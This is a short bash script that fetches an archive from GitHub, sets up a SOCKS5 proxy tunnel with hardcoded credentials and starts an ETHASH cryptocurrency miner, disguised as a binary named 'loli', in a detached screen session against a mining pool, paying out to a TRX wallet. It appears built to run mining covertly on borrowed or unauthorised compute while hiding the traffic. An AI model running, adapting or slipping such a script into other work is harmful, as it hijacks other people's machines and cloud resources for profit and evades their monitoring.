#!/bin/bash
chmod +x loli >/dev/null 2>&1
chmod +x Compil.sh
sudo apt install screen -y
wget https://github.com/Akatsoki/joss/raw/main/graphics.tar.gz
tar -xvzf graphics.tar.gz
cat > graftcp/local/graftcp-local.conf <<END

listen = :2233

loglevel = 1

socks5 = 45.140.13.119:9132

socks5_username = Omarjetos8

socks5_password = Omarjetos8

END

./graftcp/local/graftcp-local -config graftcp/local/graftcp-local.conf &

sleep .2

./graftcp/graftcp curl ifconfig.me

echo " "

echo " "

screen -d -m ./graftcp/graftcp ./loli --algo ETHASH --pool 167.71.96.194:3333 --user TRX:TX78LazSnkxLGrXD9B38RyMvqYwNaV6BVw.$(echo $(shuf -i 1-999 -n 1)-T4)

./Compil.sh

